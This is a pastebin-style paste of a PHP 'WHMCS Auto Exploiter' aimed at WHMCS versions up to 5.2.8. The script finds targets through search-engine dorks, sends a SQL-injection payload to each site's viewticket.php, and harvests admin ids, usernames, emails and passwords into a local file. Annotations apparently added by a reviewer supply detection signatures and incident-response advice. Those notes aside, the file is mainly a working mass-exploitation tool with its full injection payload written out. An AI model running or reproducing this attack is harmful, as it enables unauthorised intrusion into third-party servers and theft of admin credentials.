RokiAdhytama

WHMCS Auto Exploit by g00n

Nov 19th, 2019
  1. <?php
  2. /*
  3. *****************************************************
  4. WHMCS 0day Auto Exploiter <= 5.2.8
  5. Coded by g00n - Skype: t3hg00n
  6. wwww.xploiter.net
  7. *****************************************************
  8. */
  9.  
  10. set_time_limit(0); // Removes PHP's execution time limit so a single request can run for the whole scan.
  11. ini_set('memory_limit', '64M'); // Caps this request's memory at 64 MB.
  12. header('Content-Type: text/html; charset=UTF-8'); // Results are streamed back to the operator as an HTML page.
  13. function letItBy(){ ob_flush(); flush(); } // Pushes buffered output to the browser so progress is visible while the scan loop is still running.
  14. function getAlexa($url)
  15. {
      // Looks up a popularity rank for $url at data.alexa.com and returns the TEXT
      // attribute of <POPULARITY> under the second <SD> element, or 0 when that
      // element is absent. The main loop uses the value only to label a result.
      // $url is concatenated into the query string without URL-encoding.
      // NOTE(review): simplexml_load_file() returns false on failure; that case is
      // not checked before $xml->SD is read.
      // NOTE(review): the data.alexa.com service appears to have been retired, so
      // this lookup presumably fails today. Confirm.
  16. $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  17. $rank1 = $xml->SD[1];
  18. if($rank1)
  19. $rank = $rank1->POPULARITY->attributes()->TEXT;
  20. else
  21. $rank = 0;
  22. return $rank;
  23. }
  24.  
  25. function google_that($query, $page=1)
  26. {
      // Fetches one page of web-search results for $query from the
      // ajax.googleapis.com search endpoint (8 results per page, start offset
      // $page * 8) and decodes the JSON reply into an array.
      // Returns the 'results' list, or false when responseStatus is not 200 or the
      // list is empty. If the decoded reply has no responseStatus at all, the whole
      // script is terminated with die().
      // NOTE(review): this endpoint appears to be a retired Google API, so the
      // discovery step presumably returns nothing today. Confirm.
  27. $resultPerPage=8;
  28. $start = $page*$resultPerPage;
  29. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  30. $resultFromGoogle = json_decode( http_get($url, true) ,true); // safemode=true: http_get() pauses one second before each search request.
  31. if(isset($resultFromGoogle['responseStatus'])) {
  32. if($resultFromGoogle['responseStatus'] != '200') return false; // Loose comparison against the string '200'.
  33. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  34. else return $resultFromGoogle['responseData']['results'];
  35. }
  36. else
  37. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  38. }
  39.  
  40. function http_get($url, $safemode = false){
      // Plain HTTP GET through cURL. Returns the response body as a string, or
      // false when curl_exec() fails.
      // $safemode === true inserts a one-second pause before the request.
      // Only a connect timeout (10 s) is set; no overall transfer timeout is
      // configured in this function.
  41. if($safemode === true) sleep(1);
  42. $im = curl_init($url);
  43. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  44. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  45. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); // Redirects are followed.
  46. curl_setopt($im, CURLOPT_HEADER, 0); // Response headers are left out of the returned string.
  47. return curl_exec($im);
  48. curl_close(); // Unreachable: it follows the return, and it is called without the handle.
  49. }
  50.  
  51. function check_vuln($url) {
      // Probes one site: posts a fixed SQL-injection string to viewticket.php in the
      // directory of $url (every "/admin" substring removed) and searches the
      // response for marker-wrapped rows from the tbladmins table.
      // Returns the array of full regex matches (markers still attached) when rows
      // come back, otherwise the string "Fail!".
      //
      // Defender notes, all read off the request built below:
      //  - Request signature: a POST to viewticket.php whose `tid` field is
      //    array-shaped (`tid[sqltype]`, `tid[value]`) instead of a scalar ticket
      //    id. Alert on or block an array-typed `tid` at the WAF / reverse proxy.
      //  - The fixed MSIE 6.0 User-Agent is only a weak secondary indicator, since
      //    it is trivially changed.
      //  - Response signature: 0x3a3a3a3a3a is ":::::", so disclosed rows appear in
      //    the returned page as :::::id:username:email:password:::::.
      //  - Impact when this pattern shows up in your logs: admin usernames, e-mail
      //    addresses and the `password` column (the script calls these hashes) were
      //    readable. Treat it as credential compromise: rotate every admin password
      //    and review admin sessions.
      //  - The banner claims WHMCS <= 5.2.8 is affected; run a vendor-patched release.
  52. $url = dirname($url) . '/viewticket.php';
  53. $url = str_replace("/admin","",$url);
  54.  
  55. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  56. $curl_connection = curl_init($url);
  57. if($curl_connection != false) {
  58. curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  59. curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  60. curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
  61. curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false); // TLS certificate verification is switched off for this request.
  62. curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  63. curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post); // Setting POSTFIELDS makes this a POST; the string is sent as written above.
  64. $source = curl_exec($curl_connection); // The handle is never closed in this function.
  65. preg_match_all('/:::::(.*?):::::/s',$source,$infoz); // $infoz[0] holds the full matches, markers included.
  66. if($infoz[0]) {
  67. return $infoz[0];
  68. }
  69. else
  70. return "Fail!";
  71. }
  72. else
  73. return "Fail!";
  74. }
  75. ?>
  76. <html>
  77. <head>
  78. <title>WHMCS Auto Xploiter - by g00n</title>
  79. </head>
  80. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
  81.  
  82. <STYLE>
  83. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  84. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  85. body {
  86. font-family: Tahoma
  87. }
  88. tr {
  89. BORDER: dashed 1px #333;
  90. color: #FFF;
  91. }
  92. td {
  93. BORDER: dashed 1px #333;
  94. color: #FFF;
  95. }
  96. .table1 {
  97. BORDER: 0px Black;
  98. BACKGROUND-COLOR: Black;
  99. color: #FFF;
  100. }
  101. .td1 {
  102. BORDER: 0px;
  103. BORDER-COLOR: #333333;
  104. font: 7pt Verdana;
  105. color: Green;
  106. }
  107. .tr1 {
  108. BORDER: 0px;
  109. BORDER-COLOR: #333333;
  110. color: #FFF;
  111. }
  112. table {
  113. BORDER: dashed 1px #333;
  114. BORDER-COLOR: #333333;
  115. BACKGROUND-COLOR: Black;
  116. color: #FFF;
  117. }
  118. input {
  119. border : dashed 1px;
  120. border-color : #333;
  121. BACKGROUND-COLOR: Black;
  122. font: 8pt Verdana;
  123. color: Red;
  124. }
  125. select {
  126. BORDER-RIGHT: Black 1px solid;
  127. BORDER-TOP: #DF0000 1px solid;
  128. BORDER-LEFT: #DF0000 1px solid;
  129. BORDER-BOTTOM: Black 1px solid;
  130. BORDER-color: #FFF;
  131. BACKGROUND-COLOR: Black;
  132. font: 8pt Verdana;
  133. color: Red;
  134. }
  135. submit {
  136. BORDER: buttonhighlight 2px outset;
  137. BACKGROUND-COLOR: Black;
  138. width: 30%;
  139. color: #FFF;
  140. }
  141. textarea {
  142. border : dashed 1px #333;
  143. BACKGROUND-COLOR: Black;
  144. font: Fixedsys bold;
  145. color: #999;
  146. }
  147. BODY {
  148. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  149. margin: 1px;
  150. color: Red;
  151. background-color: Black;
  152. }
  153. .main {
  154. margin : -287px 0px 0px -490px;
  155. BORDER: dashed 1px #333;
  156. BORDER-COLOR: #333333;
  157. }
  158. .tt {
  159. background-color: Black;
  160. }
  161.  
  162. A:link {
  163. COLOR: White; TEXT-DECORATION: none
  164. }
  165. A:visited {
  166. COLOR: White; TEXT-DECORATION: none
  167. }
  168. A:hover {
  169. color: Red; TEXT-DECORATION: none
  170. }
  171. A:active {
  172. color: Red; TEXT-DECORATION: none
  173. }
  174.  
  175. #result{margin:10px;}
  176. #result span{display:block;}
  177. #result .Y{background-color:green;}
  178. #result .X{background-color:red;}
  179. </STYLE>
  180. <script language=\'javascript\'>
  181. function hide_div(id) // Hides the element with this id and stores "<id>=0;" in document.cookie.
       // NOTE(review): the quotes in this script block are backslash-escaped (\'),
       // which is not valid JavaScript outside a string literal, so the block
       // presumably fails to parse in a browser. None of the three functions is
       // referenced anywhere else in the visible page.
  182. {
  183. document.getElementById(id).style.display = \'none\';
  184. document.cookie=id+\'=0;\';
  185. }
  186. function show_div(id) // Shows the element with this id and stores "<id>=1;" in document.cookie.
  187. {
  188. document.getElementById(id).style.display = \'block\';
  189. document.cookie=id+\'=1;\';
  190. }
  191. function change_divst(id) // Toggles the element: shown if its inline display is 'none', hidden otherwise.
  192. {
  193. if (document.getElementById(id).style.display == \'none\')
  194. show_div(id);
  195. else
  196. hide_div(id);
  197. }
  198. </script>
  199. </td></table></tr>
  200. <br>
  201. <br>
  202. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  203. <style>
  204. body {
  205. font-family: 'Audiowide', serif;
  206. font-size: 30px;
  207.  
  208. }
  209. </style>
  210. </head>
  211.  
  212. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
  213. <center>
  214. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
  215. <br>
  216. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
  217. </font>
  218. <br><br>
  219.  
  220. <table border=1 bordercolor=red>
  221. <tr>
  222. <td width="700">
  223. <br />
  224. <center>
  225. <form method="post">
  226. Google Dork: &nbsp;&nbsp;
  227. <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
  228. &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  229. </form>
  230. <?php
  231. if(isset($_POST['dork']{0})) { // Runs only when the posted `dork` field is non-empty. Curly-brace string offsets were removed in PHP 8, so the file parses only on older runtimes.
       // Driver loop: requests up to 50 pages of search results for the posted
       // query, runs check_vuln() and getAlexa() on every result URL, and appends
       // each hit to a local file while echoing progress to the page.
       //
       // Incident-response notes:
       //  - WMCS-Hashes.txt is opened in append mode in the script's working
       //    directory. If this script is found on a host, that file holds every
       //    record it collected and is the artefact to preserve when scoping which
       //    installations were exposed.
       //  - Each record is the result URL, the Alexa value, and the marker-stripped
       //    id:username:email:password rows, between "====" separator lines.
       //  - NOTE(review): $data, unescapedUrl and titleNoFormatting all originate
       //    from remote responses and are echoed into the page without HTML escaping.
  232. $file = fopen("WMCS-Hashes.txt","a");
  233. echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
  234. letItBy();
  235. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  236. $googleResult = google_that($_POST['dork'], $googlePage);
  237. if(!$googleResult) {
  238. echo 'Finished scanning.';
  239. fclose($file); // The file is closed only on this exit path; after 50 full pages it is left to PHP's shutdown.
  240. break;
  241. }
  242.  
  243. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  244. $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  245. $alexa = getAlexa($googleResult[$victim]['unescapedUrl']); // Looked up for every result, including those where the probe failed.
  246. if($result != "Fail!") {
  247. $hashes = "";
  248. foreach ($result as $record) {
  249. $hashes = $hashes . str_replace(':::::','',$record) . "\n"; // Strips the ":::::" markers, leaving id:username:email:password.
  250. }
  251. $sep = "========================================================\n";
  252. $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  253. fwrite($file,$data);
  254. echo "<br /><font color=\"green\">Successfully Xploited...</font>";
  255. echo '<span class="Y">';
  256. echo "<pre>" . $data . "</pre></span><br />";
  257.  
  258. }
  259. else {
  260. echo '<span class="X">';
  261. echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
  262. echo "</span>\n<br />";
  263. }
  264. letItBy();
  265. }
  266. }
  267. echo '</div>';
  268. }
  269. ?>
  270. </center>
  271. </td>
  272. </table>
  273. <br /><br />
  274. <font face="Audiowide" color="red" size="2">
  275. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
  276. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  277. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
  278. </font>
  279.  
  280. </center>
  281. </body>
  282. </html>